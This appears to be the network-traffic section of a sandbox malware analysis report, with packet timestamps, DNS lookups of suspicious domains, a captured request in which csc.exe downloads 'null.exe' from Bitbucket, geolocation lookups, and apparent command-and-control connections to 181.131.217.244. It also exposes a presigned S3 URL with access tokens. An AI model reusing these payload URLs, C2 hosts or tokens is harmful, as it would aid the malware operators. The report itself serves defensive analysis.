                                                                                                                                            Dec 12, 2024 17:41:47.750335932 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.750369072 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.750396013 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.750422001 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.756732941 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.756761074 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.756834030 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.756851912 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.756879091 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.756912947 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.764319897 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.764357090 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.764425993 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.764478922 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.764514923 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.765063047 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.771656990 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.771687984 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.771749020 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.771800995 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.771832943 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.771855116 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.778156042 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.778182983 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.778244972 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.778301001 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.778335094 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.778939962 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.784967899 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.784991026 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.785058975 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.785067081 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.785099983 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.785120964 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.793106079 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.793138027 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.793277025 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.793277979 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.793322086 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.793433905 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.799777031 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.799804926 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.799880981 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.799901009 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.800266981 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.942257881 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.942292929 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.942363977 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.942435026 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.942471981 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.942567110 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.949784040 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.949805975 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.949887991 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.949903011 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.950017929 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.956173897 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.956193924 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.956273079 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.956296921 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.959254980 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.964375019 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.964396954 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:47.964458942 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:47.964476109 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.727180958 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.727262020 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.734323025 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.734349966 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.734440088 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.734508991 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.734909058 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.741761923 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.741785049 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.741843939 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.741875887 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.741894960 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.742116928 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.748794079 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.748823881 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.748881102 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.748914003 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.748931885 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.749027967 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.756267071 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.756285906 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.756362915 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.756401062 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.756444931 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.762651920 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.762674093 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.762738943 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.762773991 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.762793064 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.762814999 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.910355091 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.910384893 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.910446882 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.910486937 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.910507917 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.910686970 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.916884899 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.916928053 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.916979074 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.916990995 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.917021990 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.917036057 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.924245119 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.924267054 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.924319029 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.924329996 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.924356937 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.924375057 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.930584908 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.930605888 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.930653095 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.930660963 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.930687904 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.930705070 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.938123941 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.938146114 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.938200951 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.938208103 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.938232899 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.938251972 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.945012093 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.945039988 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.945097923 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.945107937 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.945136070 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.945152044 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.952527046 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.952547073 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.952590942 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.952606916 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.952629089 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.952646971 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.959975004 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.960006952 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.960051060 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.960059881 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.960088015 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.960103035 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.103877068 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.103909016 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.103965998 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.103995085 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.104015112 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.104038954 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.110688925 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.110721111 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.110769987 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.110779047 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.110816956 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.110832930 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.112888098 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.112972975 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.112998009 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.113495111 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.114506006 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:51.820370913 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:51.941239119 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:51.941487074 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:51.946708918 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:52.067656994 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:52.067724943 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:52.190613031 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:53.422435045 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:53.425204039 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:53.430774927 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:53.551068068 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:16.423259974 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:16.544270039 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:16.544398069 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:16.545423985 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:16.665369034 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:17.820688009 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:17.822395086 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:17.942219973 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:18.057919025 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:18.100867033 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:18.511322975 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:18.631402969 CET8049836178.237.33.50192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:18.631762028 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:18.631762028 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:18.751698971 CET8049836178.237.33.50192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:19.875309944 CET8049836178.237.33.50192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:19.877289057 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:19.989689112 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:20.111937046 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:20.226831913 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:20.228928089 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:20.350220919 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:20.874943972 CET8049836178.237.33.50192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:20.875041008 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:50.290949106 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:50.296288967 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:50.417057991 CET184249831181.131.217.244192.168.2.5
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 12, 2024 17:41:35.651539087 CET | 192.168.2.5 | 1.1.1.1 | 0x2344 | Standard query (0) | navegacionseguracol24vip.org | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:37.760978937 CET | 192.168.2.5 | 1.1.1.1 | 0x56a7 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.549535990 CET | 192.168.2.5 | 1.1.1.1 | 0x6150 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:42:16.278089046 CET | 192.168.2.5 | 1.1.1.1 | 0xeebb | Standard query (0) | newstaticfreepoint24.ddns-ip.net | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:42:18.368263960 CET | 192.168.2.5 | 1.1.1.1 | 0xb3db | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 12, 2024 17:41:35.855915070 CET | 1.1.1.1 | 192.168.2.5 | 0x2344 | No error (0) | navegacionseguracol24vip.org | | 181.131.217.244 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:37.899630070 CET | 1.1.1.1 | 192.168.2.5 | 0x56a7 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:37.899630070 CET | 1.1.1.1 | 192.168.2.5 | 0x56a7 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:37.899630070 CET | 1.1.1.1 | 192.168.2.5 | 0x56a7 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.203.105 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.231.41 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.158 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.21.159 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.161.249 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.17.108 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.22.158 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:41:40.788880110 CET | 1.1.1.1 | 192.168.2.5 | 0x6150 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.78.20 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:42:16.418184996 CET | 1.1.1.1 | 192.168.2.5 | 0xeebb | No error (0) | newstaticfreepoint24.ddns-ip.net | | 181.131.217.244 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 17:42:18.507611990 CET | 1.1.1.1 | 192.168.2.5 | 0xb3db | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
                                                                                                                                            • bitbucket.org
                                                                                                                                            • bbuseruploads.s3.amazonaws.com
                                                                                                                                            • geoplugin.net
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49836 | 178.237.33.50 | 80 | 768 | C:\Users\user\AppData\Local\Temp\yjfesx.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 17:42:18.631762028 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                                                                            Host: geoplugin.net
                                                                                                                                            Cache-Control: no-cache
Dec 12, 2024 17:42:19.875309944 CET | 1171 | IN | HTTP/1.1 200 OK
                                                                                                                                            date: Thu, 12 Dec 2024 16:42:19 GMT
                                                                                                                                            server: Apache
                                                                                                                                            content-length: 963
                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                            cache-control: public, max-age=300
                                                                                                                                            access-control-allow-origin: *
                                                                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":null, "geoplugin_currencySymbol_UTF8":"", "geoplugin_currencyConverter":0}


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49736 | 185.166.143.48 | 443 | 5776 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |

Timestamp | Bytes transferred | Direction | Data
2024-12-12 16:41:39 UTC | 101 | OUT | GET /facturacioncol/fact/downloads/null.exe HTTP/1.1
                                                                                                                                            Host: bitbucket.org
                                                                                                                                            Connection: Keep-Alive
2024-12-12 16:41:40 UTC | 5938 | IN | HTTP/1.1 302 Found
                                                                                                                                            Date: Thu, 12 Dec 2024 16:41:40 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 0
                                                                                                                                            Server: AtlassianEdge
                                                                                                                                            Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacup [TRUNCATED]
                                                                                                                                            Expires: Thu, 12 Dec 2024 16:41:40 GMT
                                                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                            X-Used-Mesh: False
                                                                                                                                            Vary: Accept-Language, Origin
                                                                                                                                            Content-Language: en
                                                                                                                                            X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                            X-Dc-Location: Micros-3
                                                                                                                                            X-Served-By: 0d196a66cd78
                                                                                                                                            X-Version: b7875da02c7c
                                                                                                                                            X-Static-Version: b7875da02c7c
                                                                                                                                            X-Request-Count: 411
                                                                                                                                            X-Render-Time: 0.04936671257019043
                                                                                                                                            X-B3-Traceid: 7ecc51800cc1491387e4d5abc579fa23
                                                                                                                                            X-B3-Spanid: 1eb9ef32d8c8152d
                                                                                                                                            X-Frame-Options: SAMEORIGIN
